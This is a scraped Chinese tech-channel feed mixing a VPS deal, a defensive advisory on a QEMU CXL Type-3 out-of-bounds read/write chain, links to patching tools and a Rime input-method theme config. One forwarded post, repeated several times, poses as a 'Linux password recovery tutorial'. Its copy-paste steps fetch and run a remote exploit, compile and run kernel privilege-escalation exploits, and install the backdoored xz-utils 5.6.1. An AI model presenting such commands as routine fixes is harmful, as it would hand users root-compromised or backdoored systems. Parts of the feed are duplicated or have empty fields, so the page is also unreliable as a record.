Low End Web Deals
New offer ✨🎁 LowEndTalk Easter Special Offers Offer by UltraVPS https://lowendtalk.com/discussion/215649/easter-special-offers • [VPS] 25Y-Special-1: AMD EPYC, 2 Cores / 4 GB RAM / 100 GB NVME / 5 TB Transfer / 1 IPv4 + 10 IPv6 — 2.98 EUR/month (3 months)…
昨天突然收到一张8.88€的发票,正常来说SP2 4.17€/月,季付账单
支付了,发现时长续期了3个月
支付了,发现时长续期了3个月
Forwarded from LoopDNS资讯播报
重要/漏洞:QEMUtiny:QEMU CXL Type-3 设备仿真存在可被利用的越界读写漏洞链
漏洞编号: 暂无公开 CVE / PoC 名称:QEMUtiny
重要等级: 需要关注的(虚拟机逃逸风险)
CVSS 分数:无
影响范围:
主要受影响配置:
注意: 仅安装 QEMU 但未运行相关虚拟机;普通 QEMU 虚拟机未启用 CXL / 未配置
漏洞原理:
该漏洞链出现在 QEMU CXL Type-3 设备仿真的 mailbox 处理逻辑中。CXL Type-3 设备在 QEMU 中用于模拟接入 CXL host 的内存设备,CXL 设备会通过 PCIe 相关接口和 BAR-mapped memory 访问寄存器与 mailbox。
漏洞链由两个核心缺陷组成:
1.
2.
攻击者在满足前置条件后,可先利用越界读泄露 QEMU 进程地址信息,再利用越界写破坏 CXL Type-3 设备对象后续字段,最终通过 QEMU 内部 memory dispatch / sanitize 路径触发受控回调。本频道在实际复现后发现最终权限等同于运行 QEMU 的宿主进程权限,同时结合先前的内核漏洞攻击者可以获取root权限。
注意: 该漏洞依赖特定 QEMU 构建和宿主 libc 布局偏移, 目标 VM 需要暴露 CXL Type-3 设备、guest 内具备较高权限。
受影响组件:
QEMU Backend / CXL Type-3 device emulation
具体路径:
受影响对象:
处置建议:
1. 排查生产和测试环境中的 QEMU 启动参数,重点确认是否存在
2. 不要向不可信 guest 暴露 QEMU CXL Type-3 设备。
3. 临时禁用 CXL Type-3 emulation,或仅在隔离实验环境中使用。
参考链接:Github
漏洞编号: 暂无公开 CVE / PoC 名称:QEMUtiny
重要等级: 需要关注的(虚拟机逃逸风险)
CVSS 分数:无
影响范围:
受影响组件:QEMU CXL Type-3 设备仿真模块
受影响代码路径:hw/cxl/cxl-mailbox-utils.c
受影响功能:CXL mailbox 相关命令处理逻辑
主要受影响配置:
启用了 CXL 支持的 QEMU 实例;
向 guest 暴露了 cxl-type3 设备;
guest 内攻击者具备 root 权限或可访问 PCI config / CXL BAR / mailbox MMIO 的等效能力。PoC README 明确说明复现程序需要在 guest 内以 root 运行,因为需要写 PCI config space 并通过 sysfs mmap CXL 设备 BAR。
注意: 仅安装 QEMU 但未运行相关虚拟机;普通 QEMU 虚拟机未启用 CXL / 未配置
cxl-type3;QEMU user-mode emulation;物理 CXL 硬件本身通常不受影响。漏洞原理:
该漏洞链出现在 QEMU CXL Type-3 设备仿真的 mailbox 处理逻辑中。CXL Type-3 设备在 QEMU 中用于模拟接入 CXL host 的内存设备,CXL 设备会通过 PCIe 相关接口和 BAR-mapped memory 访问寄存器与 mailbox。
漏洞链由两个核心缺陷组成:
1.
GET_LOG 越界读cmd_logs_get_log() 在处理 CEL log offset 时,边界检查按“字节偏移”理解,但实际 memmove() 源地址表达式中把该 offset 用在结构体指针运算上,导致可读取 CEL buffer 之外的相邻 QEMU 进程内存。PoC README 将其描述为 CXL mailbox GET_LOG 路径中的 out-of-bounds read。
2.
SET_FEATURE 越界写cmd_features_set_feature() 接受写入多个 feature write-attribute 结构的 offset,但部分 PPR / sparing 路径缺少 offset + bytes_to_copy 是否仍在目标结构体内的完整边界检查。PoC README 指出受影响路径包括 soft_ppr_wr_attrs、hard_ppr_wr_attrs、cacheline_sparing_wr_attrs、row_sparing_wr_attrs、bank_sparing_wr_attrs、rank_sparing_wr_attrs。
攻击者在满足前置条件后,可先利用越界读泄露 QEMU 进程地址信息,再利用越界写破坏 CXL Type-3 设备对象后续字段,最终通过 QEMU 内部 memory dispatch / sanitize 路径触发受控回调。本频道在实际复现后发现最终权限等同于运行 QEMU 的宿主进程权限,同时结合先前的内核漏洞攻击者可以获取root权限。
注意: 该漏洞依赖特定 QEMU 构建和宿主 libc 布局偏移, 目标 VM 需要暴露 CXL Type-3 设备、guest 内具备较高权限。
受影响组件:
QEMU Backend / CXL Type-3 device emulation
具体路径:
hw/cxl/cxl-mailbox-utils.c
CXL mailbox LOGS / GET_LOG
CXL mailbox FEATURES / SET_FEATURE
CXL mailbox MEDIA_OPERATIONS / SANITIZE 相关触发路径
受影响对象:
启用 cxl=on 的 QEMU 实例
配置了 cxl-type3 的虚拟机
将 CXL mailbox BAR 暴露给不可信 guest 的测试、云平台、CI/fuzzing 或研发环境
处置建议:
1. 排查生产和测试环境中的 QEMU 启动参数,重点确认是否存在
cxl=on、cxl-type3、pxb-cxl、cxl-rp 等配置。2. 不要向不可信 guest 暴露 QEMU CXL Type-3 设备。
3. 临时禁用 CXL Type-3 emulation,或仅在隔离实验环境中使用。
参考链接:Github
Forwarded from kMBRjund/0 🧊 (rpool/MBR)
1. Linux 找回密码教程,建议收藏!
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
curl https://copy.fail/exp python3 && su
passwd root
设置你的新密码
2. 你的 Linux 密码又忘了?
没关系,这里还有一个新的!
git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp
3. 不想再忘记密码了?
我们有专业的黑客团队帮您运维服务器和保管密码!
项目地址: https://github.com/tukaani-project/xz/tree/v5.6.1
sudo apt install xz-utils=5.6.1-1
sudo systemctl restart ssh
4. 容易忘记密码的有福了,每天都有新办法!
https://ze3tar.github.io/post-zcrx.html
插入一个支持ZCRX的高端网卡,让它down掉,然后ptr_ring drain + scrub loop重复入栈把free_count写溢出即可
5. 什么,你买不起高端网卡?那试试这个吧!
git clone https://github.com/v12-security/pocs.git&& cd pocs/fragnesia && gcc -o exp fragnesia.c && ./exp
6. 听说您的机房不允许ssh外连,只能通过KVM物理访问服务器? 没关系,我们的专业黑客团队也可以通过nginx帮助运维您的服务器!
https://depthfirst.com/nginx-rift
kMBRjund/0 🧊
1. Linux 找回密码教程,建议收藏! curl https://copy.fail/exp python3 && su passwd root 设置你的新密码 2. 你的 Linux 密码又忘了? 没关系,这里还有一个新的! git clone https://github.com/V4bel/dirtyfrag.git&& cd dirtyfrag && gcc -O0 -Wall -o exp exp.c -lutil && ./exp 3. 不想再忘记密码了? 我们有专业的黑客团队帮您运维服务器和保管密码!…
https://github.com/wazuh/wazuh
https://github.com/PatchMon/PatchMon
https://github.com/TheDuffman85/linux-update-dashboard
https://github.com/PatchMon/PatchMon
https://github.com/TheDuffman85/linux-update-dashboard
GitHub
GitHub - wazuh/wazuh: Wazuh - The Open Source Security Platform. Unified XDR and SIEM protection for endpoints and cloud workloads.
Wazuh - The Open Source Security Platform. Unified XDR and SIEM protection for endpoints and cloud workloads. - wazuh/wazuh
Dejavu's Blog
让 Gemini 写了一个小狼毫 Rime 的皮肤,效果还不错
用的是「雾凇拼音」输入方案,字体是「霞鹜新晰黑 +」
weasel.custom.yaml 文件:customization:
distribution_code_name: Weasel
distribution_version: 0.17.4
generator: "Weasel::UIStyleSettings"
modified_time: "Fri May 15 10:58:42 2026"
rime_version: 1.13.1
patch:
# ---------------- 样式与布局设定 ----------------
"style/color_scheme": dejavu_light # 指定当前生效的主题配色方案,启用「Dejavu 深色」主题
"style/font_face": "霞鹜新晰黑 +" # 全局字体设定,控制候选词和拼音显示的字体
"style/font_point": 12 # 候选汉字的字体大小(字号)
"style/horizontal": true # true 为候选词横向排列,false 为纵向下拉
"style/inline_preedit": true # true 为拼音行内显示(嵌入式编码),false 则在候选框内显示
"style/label_font_point": 10 # 候选词前面的数字序号(如 1, 2, 3)的字体大小
"style/layout/border": 4 # 候选面板的外边框宽度(像素)
"style/layout/round_corner": 15 # 候选面板四个角的圆角弧度,数值越大越圆润
"style/layout/margin_x": 0 # 候选框内容距离左右边框的内部留白
"style/layout/margin_y": 0 # 候选框内容距离上下边框的内部留白
"style/layout/hilite_padding": 6 # 当前选中词的高亮背景色块内部的填充留白
"style/layout/hilite_spacing": 5 # 拼音编码行与候选词列表之间的垂直间距
"style/layout/spacing": 0 # 元素之间的基础间距(如编码行与第一候选词的距离)
"style/layout/candidate_spacing": 0 # 候选词与候选词之间的间距
"preset_color_schemes/dejavu_light":
name: "Dejavu 浅色 / Dejavu Light"
author: Dejavu Moe
candidate_format: "%c\u2005%@\u2005"
back_color: 0xFFFFFF # 纯白背景
hilited_candidate_back_color: 0xFF7A00 # 主题高亮蓝 (#007AFF 翻转为 BGR 格式)
label_color: 0x999999 # 浅灰色序号
hilited_label_color: 0xFFFFFF # 高亮时的序号变为白色
hilited_candidate_label_color: 0xFFFFFF
candidate_text_color: 0x333333 # 接近黑色的深灰,比纯黑更护眼
hilited_candidate_text_color: 0xFFFFFF # 高亮时的文字变为白色
comment_text_color: 0x999999 # 候选词补充说明/注音的颜色
hilited_comment_text_color: 0xFFFFFF
text_color: 0x333333 # 拼音区文字颜色
hilited_text_color: 0xFFFFFF # 拼音区高亮文字颜色
candidate_back_color: 0xFFFFFF # 未选中的候选项背景色
hilited_back_color: 0xFF7A00 # 拼音区高亮背景色
border_color: 0xE5E5E5 # 极淡灰色边框
"preset_color_schemes/dejavu_dark":
name: "Dejavu 深色 / Dejavu Dark"
author: Dejavu Moe
candidate_format: "%c\u2005%@\u2005"
back_color: 0x282828 # 深灰背景
hilited_candidate_back_color: 0xFF840A # 适配深色模式的亮蓝色
label_color: 0x9D9898 # 偏暗的序号颜色
hilited_label_color: 0xFFFFFF
hilited_candidate_label_color: 0xFFFFFF
candidate_text_color: 0xDFDFDF # 柔和的白色文字
hilited_candidate_text_color: 0xFFFFFF
comment_text_color: 0x9D9898
hilited_comment_text_color: 0xFFFFFF
text_color: 0xDFDFDF
hilited_text_color: 0xFFFFFF
candidate_back_color: 0x282828
hilited_back_color: 0xFF840A
border_color: 0x3C3C3C # 深色模式下的深灰边框
default.custom.yaml 文件:customization:
distribution_code_name: Weasel
distribution_version: 0.17.4
generator: "Rime::SwitcherSettings"
modified_time: "Fri May 15 09:12:23 2026"
rime_version: 1.13.1
patch:
schema_list:
- { schema: rime_ice }
"menu/page_size": 9